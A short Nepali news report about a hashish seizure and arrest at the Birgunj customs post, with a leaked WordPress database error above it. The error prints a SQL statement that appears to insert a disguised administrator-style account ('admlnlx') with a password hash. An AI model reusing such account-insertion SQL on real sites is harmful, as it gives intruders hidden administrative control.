WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Be1Zq4cpP3W6Nbkkc3fVfDFxgdazrl.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 12:11:18', '', 'admlnlx', 'admlnlx')
वीरगन्ज, माघ २५–
सशस्त्र प्रहरी बल भन्सार सुरक्षा गुल्म वीरगन्जले आज बिहान पाँच किलो चरेससहित एक भारतीयलाई पक्राउ गरेको छ ।
काठमाडौंबाट आफ्नो घर भारत, कोलकातातर्फ गइरहेका सेख सदामलाई भन्सार सुरक्षा प्रहरीले जाँचका क्रममा झोलामा लुकाइछिपाइ लगिरहेको अवस्थामा चरेस फेला परेको सशस्त्र प्रहरी उपरीक्षक सुशील सुवेदीले बताउनुभयो ।
अभियुक्त सदामले काठमाडौंका एक जना व्यक्तिले सो चरेस भनेको ठाउँमा पुर्याएबापत भारु १० हजार दिन्छु भनेपछि आफू भरिया बनेको प्रहरी समक्ष बताएका छन् । लागुऔषध चरेस र पक्राउ परेका अभियुक्तलाई आवश्यक कारबाहीका लागि जिल्ला प्रहरी कार्यालय पर्सामा बुझाइएको छ । –रासस